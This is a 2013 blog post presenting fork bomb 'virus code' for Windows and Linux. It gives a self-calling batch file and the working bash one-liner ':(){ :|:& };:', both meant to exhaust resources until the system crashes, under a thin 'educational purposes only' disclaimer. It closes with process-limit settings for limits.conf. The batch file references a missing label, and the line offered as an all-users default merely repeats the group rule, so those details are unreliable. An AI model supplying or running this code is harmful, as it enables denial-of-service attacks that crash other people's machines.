Wednesday, 27 March 2013

Fork Bombing ( Virus Code ) for Windows & Linux

Hi Folks,

Let's write a virus program to generate a fork bomb...

Let's first know what is a fork bomb..

In computing, a fork bomb is a denial-of-service attack whereby a process continually replicates itself to deplete available system resources.

Fork bombs operate both by consuming CPU time in the process of forking, and by saturating the operating system's process table. A basic implementation of a fork bomb takes the following form:
        set running to true
        while running is true
            create copy of running process
        end // you wont reach here at all
For more details,click here

Let's write the code for it.

The following is windows implementation of fork bomb:

1. Open Notepad,

2. Type the following code in it,
            @echo off
        Call forkbomb.bat
        Goto loop

3. Save it as forkbomb.bat

That's it.

The, concept behind this fork bombing was recursion.

If you run this batch program,

It'll create command prompt again & again until system crashes.

Just like follows..

I'd advice you not to run this on your machine.

For test purpose,
You can run it on a VM Ware machine.

Note: All these code were for educational purposes only.

The following is linux implementation of fork bomb:

Following is a simple way to crash your Linux system as a non-root user with a bash function called recursively.

$ :(){ :|:& };: 
:() is a function which gets called recursively from its body and cannot be killed since it is running on the background with &. : is actually the name of the function. 

Here is the same function call in human readable format:

forkbomb(){ forkbomb | forkbomb & }; forkbomb
As you can see the function is calling its self twice in the body. This will start consume all resources of your system and eventually force your Linux system to crash. To get more understanding type simple function on your command line. The following function is harmless:

$ fork_bomb(){ echo "FORK BOMB"; };
$ fork_bomb
You can take same measures to ensure that your Linux users would not exploit fork bomb. Fork bomb is not a bug nor weakness of Linux system. The responsibility is in hands of systems administrators to limit number of processes available for a user by editing /etc/security/limits.conf file. To limit username fork bomb to only 50 processes add following line:

forkbomb             hard    nproc           50
If you want to limit entire group called fork bomb to only 100 processes add a line below:

@forkbomb              hard    nproc           100 
To make limit of 100 processes as a default value for all users add a following line:
@forkbomb              hard    nproc           100

No comments: